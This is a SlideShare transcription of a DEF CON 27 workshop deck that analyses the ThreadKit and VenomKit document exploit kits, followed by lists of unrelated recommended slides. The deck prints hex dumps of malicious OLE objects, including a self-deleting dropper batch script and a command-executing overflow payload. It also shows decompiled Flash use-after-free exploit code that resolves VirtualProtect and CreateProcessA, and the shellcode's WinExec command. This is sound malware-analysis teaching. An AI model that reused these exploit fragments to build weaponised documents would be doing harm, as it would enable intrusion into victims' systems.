SlideShare a Scribd company logo

DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides

Felipe Prado
Felipe Prado

The document discusses document exploit kits (DEKs) such as ThreadKit and VenomKit, which embed multiple exploits into a single RTF document. It analyzes the infection chains and exploits used by these DEKs, including exploits for Microsoft Office like CVE-2017-8570 and CVE-2017-11882, as well as an Adobe Flash CVE-2018-4878 exploit. It provides details on how the RTF format can be used to embed malicious payloads and bypass defenses. Campaigns distributing various malware families like LokiBot and FormBook using these DEKs are also mentioned.

Technology
1 of 31
Download to read offline
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. FROM EK TO DEK: ANALYZING DOCUMENT EXPLOIT KITS JOSHUA REYNOLDS, SENIOR SECURITY RESEARCHER
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. DOCUMENT EXPLOIT KITS § Traditional Exploit Kits such as RIG and Angler fingerprint browsers and deploy multiple exploits for browsers and plugins § Document Exploit Kits deploy multiple exploits for Microsoft Office, DCOM servers and ActiveX controls (E.G Adobe Flash) in a single document
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. THREADKIT AND VENOMKIT § Two prominent Document Exploit Kit families § Embed multiple exploits into a single RTF document § Multiple infection chains upon successful exploitation § Use of whitelist bypasses and other common Red Team/Pentest techniques § Use for distribution of FormBook, AZORult, LokiBot, and Netwire § Targeted campaigns by COBALT SPIDER
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. THREADKIT CAMPAIGN EXAMPLE § Spear-phishing campaign conducted by COBALT SPIDER § Posing as European Central Bank § ThreadKit document dropping COBINT
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. EXPLOITS § Multiple exploit attempts are possible due to load ordering § Microsoft Office Moniker Logic Bug Exploits § CVE-2017-0199 § CVE-2017-8570 § Equation Editor Buffer Overflow Exploits § CVE-2017-11882 § CVE-2018-0802 § Adobe Flash Use After Free Exploit § CVE-2018-4878
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. THREADKIT INFECTION CHAIN EXAMPLE ThreadKit.rtf CVE-2018-4878 CVE-2018-0802 Decoy.docUpdate.sct CVE-2017-8570 Task.bat CVE-2017-11882 SaVer.scr
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. VENOMKIT INFECTION CHAIN EXAMPLE VenomKit.rtf Decoy.doc AnTleHN.sct CVE-2017-8570 aaaaaaaa.txt CVE-2017-11882 Payload.exe cmstp.exe
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. RTF OVERVIEW § Microsoft proprietary plaintext document format § Supports embedded content § Object Linking and Embedding (OLE) objects § Pictures § Fonts § Annotations § Drawing Objects § Use of control words, control symbols and groups to define format and embedded objects § Destination control words for embedded OLE objects
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. RTF OVERVIEW { objectobjhtmlv { objdata 0105000002000000080000005061636b616765000000000000000000310 1000002007461736b2e62617400433a5c496e74656c5c7461736b2e6261 74000000030012000000433a5c496e74656c5c7461736b2-snip- } } Objdata destination control word Hex encoded OLE object
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. OLE OVERVIEW § Create documents (container application) to contain or externally reference data for another application (creating application) § Embedded Objects – Contain stored application data § Linked Objects – Reference external application data in another application § Creating Application is identified using OLE class names or CLSID § Widely supported applications, including DCOM servers and Adobe Flash
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. 00000000: 0105 0000 0200 0000 0800 0000 5061 636b ............Pack 00000010: 6167 6500 0000 0000 0000 0000 3101 0000 age.........1... 00000020: 0200 7461 736b 2e62 6174 0043 3a5c 496e ..task.bat.C:In 00000030: 7465 6c5c 7461 736b 2e62 6174 0000 0003 teltask.bat.... 00000040: 0012 0000 0043 3a5c 496e 7465 6c5c 7461 .....C:Intelta 00000050: 736b 2e62 6174 0096 0000 0045 4348 4f20 sk.bat.....ECHO 00000060: 4f46 460d 0a73 6574 2074 703d 2225 7465 OFF..set tp="%te 00000070: 6d70 255c 626c 6f63 6b2e 7478 7422 0d0a mp%block.txt".. 00000080: 4946 2045 5849 5354 2025 7470 2520 2865 IF EXIST %tp% (e 00000090: 7869 7429 2045 4c53 4520 2873 6574 2074 xit) ELSE (set t 000000a0: 703d 2225 7465 6d70 255c 626c 6f63 6b2e p="%temp%block. 000000b0: 7478 7422 2026 2063 6f70 7920 4e55 4c20 txt" & copy NUL 000000c0: 2574 7025 2026 2073 7461 7274 202f 6220 %tp% & start /b 000000d0: 2574 656d 7025 5c32 6e64 2e62 6174 290d %temp%2nd.bat). 000000e0: 0a64 656c 2022 257e 6630 220d 0a65 7869 .del "%~f0"..exi 000000f0: 7411 0000 0043 003a 005c 0049 006e 0074 t....C.:..I.n.t 00000100: 0065 006c 005c 0074 0061 0073 006b 002e .e.l..t.a.s.k.. 00000110: 0062 0061 0074 0008 0000 0074 0061 0073 .b.a.t.....t.a.s 00000120: 006b 002e 0062 0061 0074 0011 0000 0043 .k...b.a.t.....C 00000130: 003a 005c 0049 006e 0074 0065 006c 005c .:..I.n.t.e.l. 00000140: 0074 0061 0073 006b 002e 0062 0061 0074 .t.a.s.k...b.a.t 00000150: 0001 0500 0000 0000 00 ......... OLEVersion FormatID (0x00000002 denotes an EmbeddedObject) ClassName with prefixed length (Package class object) NativeDataSize (size of embedded object data) NativeData (object raw data, in this case a .bat script)
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. COMPOUND MONIKER LOGIC EXPLOIT § CVE-2017-8570 is a logic vulnerability in Microsoft Office § Allows execution of a local scriptlet file using StdOleLink class object § Scriptlet is a Package object written to %TEMP% when document is opened § Composite moniker § File Moniker references scriptlet § New Moniker § Placing logic exploits first in load order means no crashing and remaining exploit objects are loaded
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. COMPOSITE MONIKER OLE OBJECT 00000000 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................ 00000010 00 00 00 00 00 00 00 00 C0 00 00 00 09 03 00 00 ................ 00000020 00 00 00 00 C0 00 00 00 00 00 00 46 02 00 00 00 ...........F.... 00000030 03 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F 00000040 00 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060 0E 00 AD DE 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070 00 00 00 00 00 00 00 00 38 00 00 00 32 00 00 00 ........8...2... 00000080 03 00 25 00 74 00 4D 00 70 00 25 00 5C 00 69 00 ..%.t.M.p.%..i. 00000090 6E 00 74 00 65 00 6C 00 64 00 72 00 69 00 76 00 n.t.e.l.d.r.i.v. 000000A0 65 00 72 00 75 00 70 00 64 00 31 00 2E 00 73 00 e.r.u.p.d.1...s. 000000B0 63 00 74 00 C6 AF AB EC 19 7F D2 11 97 8E 00 00 c.t............. 000000C0 F8 75 7E 2A 00 00 00 00 00 00 00 00 00 00 00 00 .u~*............ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF ................ 000000E0 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F 000000F0 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ................ CLSID identifying composite moniker CLSID identifying file moniker CLSID identifying new moniker Path to scriptlet to execute
STATICALLY ANALYZE THREADKIT COMPOSITE MONIKER EXPLOIT INFECTION CHAIN Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. EQUATION EDITOR BUFFER OVERFLOW EXPLOITS § CVE-2017-11882 and CVE-2018-0802 § Creating Application is Microsoft Equation Editor (EQNEDT32.EXE) § Launched by DCOM Server Process Launcher as a Distributed Object Linking and Embedding (DCOM) server § Microsoft Word acts as client to communicate binary equation messages to server to process § DCOM Server crashes do not affect loading of remaining exploits
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. FONT RECORD BUFFER OVERFLOW § CVE-2017-11882 § Unprotected strcpy into stack buffer with user controlled data § MTEF Font record § No DEP, ASLR or stack cookies results in a vanilla buffer overflow § Overwrite return address with call to WinExec with supplied string argument as Font name to execute Package object from %TEMP%
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. FONT RECORD BUFFER OVERFLOW 00000ca0: 0000 0800 0043 6d44 202f 6320 436d 4420 .....CmD /c CmD 00000cb0: 3c20 2225 746d 5025 5c61 6161 6161 6161 < "%tmP%aaaaaaa 00000cc0: 6161 612e 7478 7422 2026 2065 7869 7420 aaa.txt" & exit 00000cd0: 2012 0c63 0044 0002 8165 0002 8166 0000 ..c.D...e...f.. Font record Name field WinExec Return Address
DYNAMICALLY ANALYZE EQNEDT32.EXE EXPLOITATION INFECTION CHAIN Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
STATICALLY ANALYZE EQNEDT32.EXE TO IDENTIFY CVE-2017-11882 Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
DYNAMICALLY ANALYZE EQNEDT32.EXE CVE-2017-11882 EXPLOITATION Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF § CVE-2018-4878 § Flash Embedded OLE CLSID cause ActiveX control DLL to be loaded into Word § DLL processes embedded Shockwave Flash (SWF) object § No sandboxing (such as in a browser environment) § Use After Free may result in a crash in Word but it’s the last exploit to be attempted
STATICALLY ANALYZE ACTIONSCRIPT TO IDENTIFY UAF TRIGGER Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – UAF TRIGGER public function MainExp() { this.shellcodBytes = MainExp_shellcodBytes; super(); data14 = new this.shellcodBytes() as ByteArray; data14.endian = Endian.LITTLE_ENDIAN; setTimeout(this.startexp,10); } public function startexp() : void { this.var_3 = new UAFGenerator(this); }
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – UAF TRIGGER public function UAFGenerator(param1:MainExp) { this.method_2(); try { new LocalConnection().connect("foo"); new LocalConnection().connect("foo"); } catch(e:Error) { this.var_13 = new DRM_obj(); } this.var_14 = new Timer(100,1000); this.var_14.addEventListener("timer",this.method_1); this.var_14.start(); }
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF - UAF TRIGGER public function method_2() : void { var _loc1_:PSDK = PSDK.pSDK; var _loc2_:PSDKEventDispatcher = _loc1_.createDispatcher(); this.var_15 = _loc1_.createMediaPlayer(_loc2_); this.var_16 = new DRM_obj(); this.var_15.drmManager.initialize(this.var_16); this.var_16 = null; }
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF - UAF TRIGGER public function method_1(param1:TimerEvent) : void { if(this.var_13.a1 != 4369) { this.var_14.stop(); this.flash25(); } }
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – DLL MEMORY SEARCH public static var flash72:Boolean = Capabilities.version.toUpperCase().search("WIN") >= 0; while(var_12 < size) { flash21.position = b + flash32(b0 + var_12); if(flash21.readUTFBytes(12).toLowerCase() == "kernel32.dll") { oft = flash32(b0 + var_12 - 3 * 4); ft = flash32(b0 + var_12 + 4); break; } var_12 = var_12 + 5 * 4; }
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – GADGET RESOLUTION -snip- if(flash21.readUTF().toLowerCase() == "virtualprotect") { gadget3 = flash32(b + ft + var_12 * 4); c++; -snip- else { flash21.position = b + b0; if(flash21.readUTF().toLowerCase() == "createprocessa") { CreateProcessFunc = flash32(b + ft + var_12 * 4); c++; -snip-
STATICALLY ANALYZE ACTIONSCRIPT TO EXTRACT AND ANALYZE SHELLCODE Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF - SHELLCODE § Shellcode walks the InMemoryOrderModuleList § Hashes each module name to find kernel32.dll with the hash 0x6A4ABC5B § Export table for kernel32.dll is searched for two hex values in memory, 0x50746547 meaning “PteG” and 0x41636F72 meaning “Acor”, i.e GetProcA, which is the substring used to identify the GetProcAddress function § 0x636578 (meaning “cex”) and 0x456E6957 (meaning “EniW”) i.e WinExec § GetProcAddress to resolve the function address § WinExec is called to execute the following command: § cmd.exe /c %temp%task.bat

Recommended

Input sanitization
Input sanitizationInput sanitization
Input sanitization
Philip Tellis
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware Analysis
Brian Baskin
 
Us20110166903
Us20110166903Us20110166903
Us20110166903
101 Islands
 
Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)
Massimo Oliviero
 
Moving from Web 1.0 to Web 2.0
Moving from Web 1.0 to Web 2.0Moving from Web 1.0 to Web 2.0
Moving from Web 1.0 to Web 2.0
Estelle Weyl
 
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays
 
Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)
Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)
Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)
yarusun
 
PyConX - Python & MySQL 8.0 Document Store
PyConX - Python & MySQL 8.0 Document StorePyConX - Python & MySQL 8.0 Document Store
PyConX - Python & MySQL 8.0 Document Store
Frederic Descamps
 

Recommended

Input sanitization
Input sanitizationInput sanitization
Input sanitization
Philip Tellis
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware Analysis
Brian Baskin
 
Us20110166903
Us20110166903Us20110166903
Us20110166903
101 Islands
 
Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)
Massimo Oliviero
 
Moving from Web 1.0 to Web 2.0
Moving from Web 1.0 to Web 2.0Moving from Web 1.0 to Web 2.0
Moving from Web 1.0 to Web 2.0
Estelle Weyl
 
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays
 
Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)
Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)
Verified AZ-104 Exam Dumps (V26.02) - Pass Microsoft AZ-104 Exam (2024)
yarusun
 
PyConX - Python & MySQL 8.0 Document Store
PyConX - Python & MySQL 8.0 Document StorePyConX - Python & MySQL 8.0 Document Store
PyConX - Python & MySQL 8.0 Document Store
Frederic Descamps
 
Platform agnostic information systems development
Platform agnostic information systems developmentPlatform agnostic information systems development
Platform agnostic information systems development
Mark Jayson Fuentes
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
Association Paris-Web
 
LarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC Tutorial at ISWC 2009 - Second Hands-on ScenarioLarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC
 
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
Thomas Conté
 
StampedeCon 2015 Keynote
StampedeCon 2015 KeynoteStampedeCon 2015 Keynote
StampedeCon 2015 Keynote
Ken Owens
 
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
StampedeCon
 
Threat Modelling - It's not just for developers
Threat Modelling - It's not just for developersThreat Modelling - It's not just for developers
Threat Modelling - It's not just for developers
MITRE ATT&CK
 
Sql Portfolio
Sql PortfolioSql Portfolio
Sql Portfolio
Shelli Ciaschini
 
Cloud Computing in Mobile
Cloud Computing in MobileCloud Computing in Mobile
Cloud Computing in Mobile
SVWB
 
6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf
EMERSON EDUARDO RODRIGUES
 
NSA for Enterprises Log Analysis Use Cases
NSA for Enterprises Log Analysis Use Cases NSA for Enterprises Log Analysis Use Cases
NSA for Enterprises Log Analysis Use Cases
WSO2
 
27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor
Freddy Buenaño
 
20200402 oracle cloud infrastructure data science
20200402 oracle cloud infrastructure data science20200402 oracle cloud infrastructure data science
20200402 oracle cloud infrastructure data science
Kenichi Sonoda
 
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
r-kor
 
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Masashi Shibata
 
Advanced ETL MS SSIS 2012 & Talend
Advanced ETL MS SSIS 2012 & Talend Advanced ETL MS SSIS 2012 & Talend
Advanced ETL MS SSIS 2012 & Talend
Sunny U Okoro
 
Loopback presentation by tineco
Loopback presentation by tinecoLoopback presentation by tineco
Loopback presentation by tineco
Stéphane Guilly
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB
 
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Ageクラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
Yoichi Kawasaki
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
Felipe Prado
 

More Related Content

Similar to DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides

Platform agnostic information systems development
Platform agnostic information systems developmentPlatform agnostic information systems development
Platform agnostic information systems development
Mark Jayson Fuentes
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
Association Paris-Web
 
LarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC Tutorial at ISWC 2009 - Second Hands-on ScenarioLarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC
 
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
Thomas Conté
 
StampedeCon 2015 Keynote
StampedeCon 2015 KeynoteStampedeCon 2015 Keynote
StampedeCon 2015 Keynote
Ken Owens
 
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
StampedeCon
 
Threat Modelling - It's not just for developers
Threat Modelling - It's not just for developersThreat Modelling - It's not just for developers
Threat Modelling - It's not just for developers
MITRE ATT&CK
 
Sql Portfolio
Sql PortfolioSql Portfolio
Sql Portfolio
Shelli Ciaschini
 
Cloud Computing in Mobile
Cloud Computing in MobileCloud Computing in Mobile
Cloud Computing in Mobile
SVWB
 
6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf
EMERSON EDUARDO RODRIGUES
 
NSA for Enterprises Log Analysis Use Cases
NSA for Enterprises Log Analysis Use Cases NSA for Enterprises Log Analysis Use Cases
NSA for Enterprises Log Analysis Use Cases
WSO2
 
27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor
Freddy Buenaño
 
20200402 oracle cloud infrastructure data science
20200402 oracle cloud infrastructure data science20200402 oracle cloud infrastructure data science
20200402 oracle cloud infrastructure data science
Kenichi Sonoda
 
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
r-kor
 
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Masashi Shibata
 
Advanced ETL MS SSIS 2012 & Talend
Advanced ETL MS SSIS 2012 & Talend Advanced ETL MS SSIS 2012 & Talend
Advanced ETL MS SSIS 2012 & Talend
Sunny U Okoro
 
Loopback presentation by tineco
Loopback presentation by tinecoLoopback presentation by tineco
Loopback presentation by tineco
Stéphane Guilly
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB
 
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Ageクラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
Yoichi Kawasaki
 

Similar to DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides (20)

Platform agnostic information systems development
Platform agnostic information systems developmentPlatform agnostic information systems development
Platform agnostic information systems development
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
 
LarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC Tutorial at ISWC 2009 - Second Hands-on ScenarioLarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
LarKC Tutorial at ISWC 2009 - Second Hands-on Scenario
 
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
 
StampedeCon 2015 Keynote
StampedeCon 2015 KeynoteStampedeCon 2015 Keynote
StampedeCon 2015 Keynote
 
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
How Cisco Migrated from MapReduce Jobs to Spark Jobs - StampedeCon 2015
 
Threat Modelling - It's not just for developers
Threat Modelling - It's not just for developersThreat Modelling - It's not just for developers
Threat Modelling - It's not just for developers
 
Sql Portfolio
Sql PortfolioSql Portfolio
Sql Portfolio
 
Cloud Computing in Mobile
Cloud Computing in MobileCloud Computing in Mobile
Cloud Computing in Mobile
 
6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf
 
NSA for Enterprises Log Analysis Use Cases
NSA for Enterprises Log Analysis Use Cases NSA for Enterprises Log Analysis Use Cases
NSA for Enterprises Log Analysis Use Cases
 
27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor
 
20200402 oracle cloud infrastructure data science
20200402 oracle cloud infrastructure data science20200402 oracle cloud infrastructure data science
20200402 oracle cloud infrastructure data science
 
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
Digital Transformation, OSS, 모두를 위한 AI - 마이크로소프트의 관점
 
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018
 
Advanced ETL MS SSIS 2012 & Talend
Advanced ETL MS SSIS 2012 & Talend Advanced ETL MS SSIS 2012 & Talend
Advanced ETL MS SSIS 2012 & Talend
 
Loopback presentation by tineco
Loopback presentation by tinecoLoopback presentation by tineco
Loopback presentation by tineco
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDB
 
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Ageクラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
クラウドネイティブ時代の分散トレーシング - Distributed Tracing in a Cloud Native Age
 

More from Felipe Prado

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
Felipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got ants
Felipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryption
Felipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101
Felipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
